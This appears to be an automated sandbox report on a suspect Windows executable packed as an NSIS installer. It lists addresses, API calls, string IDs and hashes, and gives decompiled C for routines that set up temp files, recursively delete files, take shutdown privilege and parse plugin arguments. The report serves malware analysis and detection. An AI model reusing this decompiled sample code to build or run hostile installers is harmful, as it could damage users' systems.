                                                                                                        0x00403325
                                                                                                        0x00403325
                                                                                                        0x00403323
                                                                                                        0x00403328
                                                                                                        0x0040332e
                                                                                                        0x00403336
                                                                                                        0x00403339
                                                                                                        0x0040333b
                                                                                                        0x0040333b
                                                                                                        0x0040333b
                                                                                                        0x00403339
                                                                                                        0x0040333e
                                                                                                        0x00403345
                                                                                                        0x0040335f
                                                                                                        0x00403362
                                                                                                        0x0040336b
                                                                                                        0x00403370
                                                                                                        0x00403370
                                                                                                        0x0040337b
                                                                                                        0x00403381
                                                                                                        0x00403386
                                                                                                        0x00403388
                                                                                                        0x004033aa
                                                                                                        0x004033af
                                                                                                        0x004033b6
                                                                                                        0x004033bd
                                                                                                        0x004033c1
                                                                                                        0x00403428
                                                                                                        0x00403428
                                                                                                        0x0040342d
                                                                                                        0x00403437
                                                                                                        0x00403522
                                                                                                        0x00403528
                                                                                                        0x00403533
                                                                                                        0x0040353c
                                                                                                        0x0040353e
                                                                                                        0x00403543
                                                                                                        0x00403545
                                                                                                        0x00403547
                                                                                                        0x00403549
                                                                                                        0x0040354b
                                                                                                        0x0040354d
                                                                                                        0x0040354f
                                                                                                        0x0040355f
                                                                                                        0x00403561
                                                                                                        0x00403563
                                                                                                        0x00403570
                                                                                                        0x0040357f
                                                                                                        0x00403587
                                                                                                        0x0040358f
                                                                                                        0x0040358f
                                                                                                        0x00403563
                                                                                                        0x0040354f
                                                                                                        0x0040354b
                                                                                                        0x00403594
                                                                                                        0x0040359a
                                                                                                        0x0040359c
                                                                                                        0x004035a0
                                                                                                        0x004035a0
                                                                                                        0x0040359c
                                                                                                        0x004035a5
                                                                                                        0x004035aa
                                                                                                        0x004035ad
                                                                                                        0x004035af
                                                                                                        0x004035af
                                                                                                        0x004035b7
                                                                                                        0x004035b7
                                                                                                        0x00403446
                                                                                                        0x0040344d
                                                                                                        0x0040344d
                                                                                                        0x004033c9
                                                                                                        0x00403418
                                                                                                        0x00403418
                                                                                                        0x00403424
                                                                                                        0x00000000
                                                                                                        0x00403424
                                                                                                        0x004033d2
                                                                                                        0x004033df
                                                                                                        0x004033d6
                                                                                                        0x004033dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004033de
                                                                                                        0x004033de
                                                                                                        0x004033de
                                                                                                        0x004033e3
                                                                                                        0x004033e5
                                                                                                        0x004033ed
                                                                                                        0x00403459
                                                                                                        0x0040346d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403471
                                                                                                        0x00403478
                                                                                                        0x0040347e
                                                                                                        0x00403484
                                                                                                        0x0040348c
                                                                                                        0x0040348c
                                                                                                        0x0040349a
                                                                                                        0x004034a1
                                                                                                        0x004034aa
                                                                                                        0x004034b0
                                                                                                        0x004034bc
                                                                                                        0x004034c2
                                                                                                        0x004034cc
                                                                                                        0x004034e0
                                                                                                        0x004034e1
                                                                                                        0x004034e2
                                                                                                        0x004034f3
                                                                                                        0x004034f9
                                                                                                        0x00403500
                                                                                                        0x00403503
                                                                                                        0x00403509
                                                                                                        0x00403509
                                                                                                        0x00403500
                                                                                                        0x0040350d
                                                                                                        0x00403513
                                                                                                        0x00403513
                                                                                                        0x00403516
                                                                                                        0x00403517
                                                                                                        0x00403518
                                                                                                        0x00000000
                                                                                                        0x00403518
                                                                                                        0x004033ef
                                                                                                        0x004033f1
                                                                                                        0x004033fc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403404
                                                                                                        0x0040340f
                                                                                                        0x00403414
                                                                                                        0x00000000
                                                                                                        0x00403414
                                                                                                        0x00403390
                                                                                                        0x0040339c
                                                                                                        0x004033a1
                                                                                                        0x004033a6
                                                                                                        0x004033a8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004033a8
                                                                                                        0x00000000
                                                                                                        0x00403345
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004032f9
                                                                                                        0x004032f9
                                                                                                        0x004032f9
                                                                                                        0x004032fa
                                                                                                        0x004032fa
                                                                                                        0x00000000
                                                                                                        0x004032f9
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • #17.COMCTL32 ref: 0040325B
                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403266
                                                                                                        • OleInitialize.OLE32(00000000), ref: 0040326D
                                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                        • SHGetFileInfoA.SHELL32(0041F458,00000000,?,00000160,00000000,00000008), ref: 00403295
                                                                                                          • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                        • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 004032AA
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,00000000), ref: 004032BD
                                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,00000020), ref: 004032E8
                                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040337B
                                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403390
                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339C
                                                                                                        • DeleteFileA.KERNELBASE(1033), ref: 004033AF
                                                                                                        • OleUninitialize.OLE32(00000000), ref: 0040342D
                                                                                                        • ExitProcess.KERNEL32 ref: 0040344D
                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,00000000,00000000), ref: 00403459
                                                                                                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,00000000,00000000), ref: 00403465
                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403471
                                                                                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403478
                                                                                                        • DeleteFileA.KERNEL32(0041F058,0041F058,?,00424000,?), ref: 004034C2
                                                                                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\KY4cmAI0jU.exe,0041F058,00000001), ref: 004034D6
                                                                                                        • CloseHandle.KERNEL32(00000000,0041F058,0041F058,?,0041F058,00000000), ref: 00403503
                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403558
                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403594
                                                                                                        • ExitProcess.KERNEL32 ref: 004035B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                        • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\KY4cmAI0jU.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\KY4cmAI0jU.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                        • API String ID: 2278157092-1413169155
                                                                                                        • Opcode ID: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                                        • Instruction ID: d9df3101e86bd055252ea398e1a167ecdf9755d8b7b18b8fa076e16bcd865dbe
                                                                                                        • Opcode Fuzzy Hash: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                                        • Instruction Fuzzy Hash: E191D231A087417EE7216F609D49B2B7EACEB01306F44457BF941B61E2C77CAE058B6E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040548B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E0040548B(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040573A(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B66(0x4214a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056A0(_t72);
					} else {
						lstrcatA(0x4214a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405684( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B66(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040581E(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404F04(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404F04(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004058B4();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040548B(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a8 - 0x5c;
					if( *0x4214a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E61(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405659(_t72);
							E0040581E(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404F04(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404F04(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004058B4();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                                        0x00405496
                                                                                                        0x0040549a
                                                                                                        0x004054a3
                                                                                                        0x004054a6
                                                                                                        0x004054a9
                                                                                                        0x004054b1
                                                                                                        0x004054b3
                                                                                                        0x004054b4
                                                                                                        0x00000000
                                                                                                        0x004054b4
                                                                                                        0x004054c3
                                                                                                        0x004054c3
                                                                                                        0x004054c6
                                                                                                        0x004054c9
                                                                                                        0x004054dd
                                                                                                        0x004054e4
                                                                                                        0x004054e9
                                                                                                        0x004054eb
                                                                                                        0x004054fb
                                                                                                        0x004054ed
                                                                                                        0x004054f3
                                                                                                        0x004054f3
                                                                                                        0x00405500
                                                                                                        0x00405503
                                                                                                        0x0040550e
                                                                                                        0x00405514
                                                                                                        0x00405519
                                                                                                        0x00405529
                                                                                                        0x0040552b
                                                                                                        0x00405531
                                                                                                        0x00405534
                                                                                                        0x00405537
                                                                                                        0x004055f4
                                                                                                        0x004055f4
                                                                                                        0x004055f8
                                                                                                        0x004055fa
                                                                                                        0x004055fa
                                                                                                        0x004055fa
                                                                                                        0x004055fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040553d
                                                                                                        0x0040553d
                                                                                                        0x00405546
                                                                                                        0x0040554c
                                                                                                        0x00405551
                                                                                                        0x00405554
                                                                                                        0x00405556
                                                                                                        0x0040555a
                                                                                                        0x0040555c
                                                                                                        0x0040555c
                                                                                                        0x0040555a
                                                                                                        0x0040555f
                                                                                                        0x00405562
                                                                                                        0x00405575
                                                                                                        0x00405577
                                                                                                        0x0040557c
                                                                                                        0x00405583
                                                                                                        0x0040559b
                                                                                                        0x004055a1
                                                                                                        0x004055a7
                                                                                                        0x004055a9
                                                                                                        0x004055ce
                                                                                                        0x004055ab
                                                                                                        0x004055ab
                                                                                                        0x004055af
                                                                                                        0x004055c3
                                                                                                        0x004055b1
                                                                                                        0x004055b4
                                                                                                        0x004055b9
                                                                                                        0x004055bb
                                                                                                        0x004055bc
                                                                                                        0x004055bc
                                                                                                        0x004055af
                                                                                                        0x00405585
                                                                                                        0x0040558b
                                                                                                        0x0040558d
                                                                                                        0x00405593
                                                                                                        0x00405593
                                                                                                        0x0040558d
                                                                                                        0x00000000
                                                                                                        0x00405583
                                                                                                        0x00405564
                                                                                                        0x00405567
                                                                                                        0x00405569
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040556b
                                                                                                        0x0040556d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040556f
                                                                                                        0x00405573
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004055d3
                                                                                                        0x004055dd
                                                                                                        0x004055e3
                                                                                                        0x004055e3
                                                                                                        0x004055ee
                                                                                                        0x00000000
                                                                                                        0x004055ee
                                                                                                        0x00405505
                                                                                                        0x0040550c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004054cb
                                                                                                        0x004054cb
                                                                                                        0x004054cd
                                                                                                        0x004055fe
                                                                                                        0x00405601
                                                                                                        0x00405604
                                                                                                        0x00405656
                                                                                                        0x00405656
                                                                                                        0x00405656
                                                                                                        0x00405606
                                                                                                        0x00405609
                                                                                                        0x00405614
                                                                                                        0x00405619
                                                                                                        0x0040561b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040561e
                                                                                                        0x00405624
                                                                                                        0x0040562a
                                                                                                        0x00405630
                                                                                                        0x00405632
                                                                                                        0x00000000
                                                                                                        0x0040564e
                                                                                                        0x00405634
                                                                                                        0x00405638
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040563d
                                                                                                        0x00405642
                                                                                                        0x00405643
                                                                                                        0x00000000
                                                                                                        0x00405644
                                                                                                        0x0040560b
                                                                                                        0x0040560b
                                                                                                        0x00000000
                                                                                                        0x0040560b
                                                                                                        0x004054d3
                                                                                                        0x004054d7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004054d7

                                                                                                        APIs
                                                                                                        • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,74B5F560), ref: 004054A9
                                                                                                        • lstrcatA.KERNEL32(004214A8,\*.*,004214A8,?,00000000,?,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,74B5F560), ref: 004054F3
                                                                                                        • lstrcatA.KERNEL32(?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,74B5F560), ref: 00405514
                                                                                                        • lstrlenA.KERNEL32(?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,74B5F560), ref: 0040551A
                                                                                                        • FindFirstFileA.KERNEL32(004214A8,?,?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,74B5F560), ref: 0040552B
                                                                                                        • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004055DD
                                                                                                        • FindClose.KERNEL32(?), ref: 004055EE
                                                                                                        Strings
                                                                                                        • "C:\Users\user\Desktop\KY4cmAI0jU.exe" , xrefs: 00405495
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
                                                                                                        • \*.*, xrefs: 004054ED
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                        • String ID: "C:\Users\user\Desktop\KY4cmAI0jU.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                        • API String ID: 2035342205-2455861505
                                                                                                        • Opcode ID: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
                                                                                                        • Instruction ID: bc429f5d1e1b14784ce7e3564347ec6ed469848bfd5577fff983359c073685a4
                                                                                                        • Opcode Fuzzy Hash: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
                                                                                                        • Instruction Fuzzy Hash: 0351F331904A447ADB216B218C45BBF3B79CF42728F54847BF905711E2CB3C5A82DE6E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 73751A98, Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E73751A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E73751215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E73751215();
				_t320 = E7375123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E737512FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E73751534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x73752259) & 0x000000ff) * 4 +  &M737521CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E73751224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E73751215();
											 &_v12 = E73751A36( &_v12);
											__eax = E73751429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E73751A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
